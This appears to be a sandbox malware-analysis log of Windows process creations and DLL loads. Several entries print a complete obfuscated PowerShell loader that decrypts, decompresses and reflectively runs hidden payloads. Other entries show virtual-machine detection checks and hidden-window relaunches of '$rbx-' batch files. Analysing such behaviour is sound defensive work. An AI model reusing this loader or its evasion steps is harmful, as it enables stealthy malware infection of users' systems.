Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Users\user\Desktop\1.cmd';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 
'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] (''));
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{3837e362-e74e-494b-bcc5-affaf78d43c0}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dll
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: textinputframework.dll
